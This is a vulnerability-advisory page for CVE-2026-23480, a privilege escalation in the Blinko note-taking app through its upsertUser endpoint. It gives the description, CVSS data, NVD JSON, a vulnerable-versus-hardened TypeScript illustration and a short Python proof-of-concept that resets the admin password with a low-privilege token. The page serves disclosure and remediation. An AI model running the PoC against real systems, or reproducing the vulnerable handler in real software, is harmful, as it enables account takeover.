Security Vulnerability Report
CVE-2026-23480 CVSS 8.8 HIGH

CVE-2026-23480

Published: 2026-03-23 21:17:02
Last Modified: 2026-03-24 18:33:48

Description

Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is a privilege escalation vulnerability. The upsertUser endpoint has 3 issues: it is missing superAdminAuthMiddleware, so any logged-in user can call it; originalPassword is an optional parameter, and if it is not provided, password verification is skipped; and there is no check that input.id === ctx.id (ownership verification). As a result, any authenticated user could modify other users' passwords, escalate directly to superadmin, and take over accounts completely. This issue has been patched in version 1.8.4.
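To make the three missing checks concrete, here is an added illustration in TypeScript (Blinko's own language) that is not Blinko's code and not taken from the patch commit: a toy tRPC-style upsertUser handler in the shape the advisory describes, next to a hardened form that adds an ownership/superadmin gate, restricts role changes to superadmins, and makes originalPassword mandatory for self-service password changes. All type names, the in-memory user store, and the password "hash" are assumptions for illustration only; the real superAdminAuthMiddleware is modelled as an inline check that also permits a user to edit their own record.

```typescript
// Added illustration, not Blinko's code: a toy tRPC-style "upsertUser"
// handler with the three checks the advisory says were missing before 1.8.4.
// Every name and the in-memory user store below are assumptions for
// illustration; the password "hash" is a constructed stand-in.

type Role = "user" | "superadmin";
interface User { id: number; name: string; passwordHash: string; role: Role }
interface Ctx { id: number; role: Role }            // the authenticated caller
interface UpsertInput {
  id?: number;                 // target user; defaults to the caller
  name?: string;
  password?: string;           // new password
  originalPassword?: string;   // current password, for self-service changes
  role?: Role;
}
class Forbidden extends Error {}

// Constructed stand-in for a real password hash (use bcrypt/argon2 in practice).
const hash = (p: string): string => `h:${p}`;
const verify = (p: string, h: string): boolean => hash(p) === h;

// Fresh in-memory store so each scenario starts from the same state.
function seedUsers(): Map<number, User> {
  return new Map<number, User>([
    [1, { id: 1, name: "admin", passwordHash: hash("admin-pw"), role: "superadmin" }],
    [2, { id: 2, name: "alice", passwordHash: hash("alice-pw"), role: "user" }],
  ]);
}

// Shape of the flaw as the advisory describes it: any logged-in user may call
// it, the target id is taken from input unchecked, and originalPassword is
// only verified when the caller chooses to send it.
function upsertUserVulnerable(users: Map<number, User>, ctx: Ctx, input: UpsertInput): User {
  const target = users.get(input.id ?? ctx.id);
  if (!target) throw new Error("no such user");
  if (input.password !== undefined) {
    if (input.originalPassword !== undefined && !verify(input.originalPassword, target.passwordHash)) {
      throw new Forbidden("wrong current password");
    }
    target.passwordHash = hash(input.password);
  }
  if (input.role !== undefined) target.role = input.role;
  if (input.name !== undefined) target.name = input.name;
  return target;
}

// Hardened form: ownership gate, admin-only role changes, and mandatory
// current-password verification for self-service password changes.
function upsertUserHardened(users: Map<number, User>, ctx: Ctx, input: UpsertInput): User {
  const targetId = input.id ?? ctx.id;
  const isSelf = targetId === ctx.id;
  const isAdmin = ctx.role === "superadmin";
  // Check 1: ownership. A non-admin may only modify its own record.
  if (!isSelf && !isAdmin) throw new Forbidden("cannot modify another user");
  // Check 2: privilege changes are reserved for superadmins.
  if (input.role !== undefined && !isAdmin) throw new Forbidden("role change requires superadmin");
  const target = users.get(targetId);
  if (!target) throw new Error("no such user");
  if (input.password !== undefined) {
    // Check 3: originalPassword is required, not optional, when changing
    // one's own password. Admin resets of other accounts skip it by design.
    if (isSelf && (input.originalPassword === undefined || !verify(input.originalPassword, target.passwordHash))) {
      throw new Forbidden("current password required");
    }
    target.passwordHash = hash(input.password);
  }
  if (input.role !== undefined) target.role = input.role;
  if (input.name !== undefined) target.name = input.name;
  return target;
}
```

The design point is that the three checks are independent: an ownership gate alone would still let a user drop their own originalPassword, and a mandatory originalPassword alone would still let a user target someone else's id. A superadmin resetting another account without the current password is allowed here as a deliberate choice, which is why that path should also be covered by audit logging.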

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:* - VULNERABLE
Blinko < 1.8.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target URL
target_url = "http://target-domain.com/api/upsertUser"

# Attacker's session cookie (low privilege user)
cookies = {
    "token": "attacker_low_privilege_token"
}

# Payload to escalate privileges or reset admin password
# ID 1 is typically the admin, originalPassword is omitted to bypass check
payload = {
    "id": 1,
    "password": "new_admin_password"
}

response = requests.post(target_url, json=payload, cookies=cookies)

if response.status_code == 200:
    print("[+] Privilege escalation successful! Admin password changed.")
else:
    print("[-] Exploit failed.")
```

References

https://github.com/blinkospace/blinko/commit/3afbdf486b6f371bdac5781dea6289749f2c4c03 (Patch)
https://github.com/blinkospace/blinko/releases/tag/1.8.4 (Release Notes)
https://github.com/blinkospace/blinko/security/advisories/GHSA-r3mv-q7ww-86p6 (Vendor Advisory)
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-23480",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-23T21:17:01.940",
    "lastModified": "2026-03-24T18:33:48.443",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Blinko is an AI-powered card note-taking project. Prior to version 1.8.4, there is a privilege escalation vulnerability. The upsertUser endpoint has 3 issues: it is missing superAdminAuthMiddleware, any logged-in user can call it; the originalPassword is an optional parameter and if not provided password verification is skipped; there is no check for input.id === ctx.id (ownership verification). This could result in any authenticated user modifying other users' passwords, direct escalation to superadmin, and complete account takeover. This issue has been patched in version 1.8.4."
      },
      {
        "lang": "es",
        "value": "Blinko es un proyecto de toma de notas en tarjetas impulsado por IA. Antes de la versión 1.8.4, existe una vulnerabilidad de escalada de privilegios. El endpoint upsertUser tiene 3 problemas: le falta superAdminAuthMiddleware, cualquier usuario con sesión iniciada puede llamarlo; el originalPassword es un parámetro opcional y si no se proporciona, la verificación de contraseña se omite; no hay una verificación para input.id === ctx.id (verificación de propiedad). Esto podría resultar en que cualquier usuario autenticado modifique las contraseñas de otros usuarios, una escalada directa a superadministrador y una toma de control completa de la cuenta. Este problema ha sido parcheado en la versión 1.8.4."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "vulnConfidentialityImpact": "NONE",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "NONE",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {"lang": "en", "value": "CWE-288"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:blinko:blinko:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "1.8.4",
                "matchCriteriaId": "31941A3D-C688-40DF-AA55-1AF9056275D0"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/blinkospace/blinko/commit/3afbdf486b6f371bdac5781dea6289749f2c4c03",
        "source": "[email protected]",
        "tags": ["Patch"]
      },
      {
        "url": "https://github.com/blinkospace/blinko/releases/tag/1.8.4",
        "source": "[email protected]",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://github.com/blinkospace/blinko/security/advisories/GHSA-r3mv-q7ww-86p6",
        "source": "[email protected]",
        "tags": ["Vendor Advisory"]
      }
    ]
  }
}
```